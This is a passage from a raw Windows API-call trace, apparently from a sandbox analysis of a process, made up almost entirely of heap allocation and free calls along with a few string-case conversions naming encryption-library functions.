lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0093.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0093.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0093.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0093.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0093.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4807) returned 0x4516010 [0093.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0d020 | out: hHeap=0x1780000) returned 1 [0093.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0093.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0093.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0093.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0093.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0093.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4807) returned 0x451a820 [0093.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0093.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0093.727] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0093.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0093.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0093.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0093.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0093.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0093.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4807) returned 0x4516010 [0093.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0093.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0093.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0093.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0093.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0093.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0093.728] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0093.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0093.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0093.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0093.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0093.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0093.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0093.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0093.728] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0093.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0093.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0093.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d58 [0093.728] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0093.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d58 | out: hHeap=0x1780000) returned 1 [0093.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0093.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0093.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25e0 [0093.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0093.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0093.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0093.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0093.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4807) returned 0x4516010 [0093.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0093.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2640 [0093.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0093.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0093.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0093.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2680 [0093.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0093.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0093.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0093.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26d0 [0093.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0093.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0093.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0093.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca940 [0093.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0093.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0093.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0093.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0093.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0093.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4807) returned 0x451f030 [0093.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0093.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0093.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0093.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0093.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0093.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0093.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0093.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0093.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0093.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0093.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0093.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0093.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0093.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0093.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0093.730] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0093.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0093.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0093.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0093.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0093.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41abfc0 [0093.730] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0093.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0093.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0093.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0093.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0093.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0093.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0093.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0093.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0093.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0093.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0093.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0093.731] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0093.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0093.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0093.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0093.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2770 [0093.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0093.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0093.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0093.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0093.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca868 [0093.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0093.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0093.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0093.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0093.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0093.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0093.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0093.732] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0093.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0093.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0093.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0093.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0093.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0093.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0093.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0093.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0093.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0093.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0093.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0093.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0093.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ec8 [0093.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0093.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0093.732] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0093.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2bd8 [0093.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0093.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0093.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0093.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0093.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0093.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0093.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0093.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0093.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0093.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0093.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0093.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0093.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0093.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0093.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0093.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0093.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0093.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0093.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0093.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0093.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0093.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0093.733] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0093.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0093.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0093.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0093.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0093.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0093.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0093.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0093.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0093.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0093.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0093.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0093.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f50 [0093.734] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0093.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f50 | out: hHeap=0x1780000) returned 1 [0093.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0093.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa78 [0093.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0093.734] PeekMessageW (in: lpMsg=0x144dfec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dfec) returned 0 [0093.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0093.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0093.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0093.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0093.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0093.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0093.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0093.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0093.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0093.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0093.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0093.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0093.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0093.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0093.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0093.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0093.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0093.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0093.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0093.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0093.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0093.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0093.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0093.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0093.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0093.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0093.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0093.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0093.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0093.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0093.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0093.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0093.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0093.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0093.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0093.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0093.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0093.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e88 [0093.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2668 [0093.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0093.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0093.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0093.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0093.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0093.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0093.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0093.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0093.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0093.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0093.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0093.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0093.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797128 [0093.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0093.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0093.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0093.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0093.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0093.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0093.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0093.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0093.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0093.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0093.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0093.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0093.737] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0093.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0093.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0093.737] HeapFree (in: 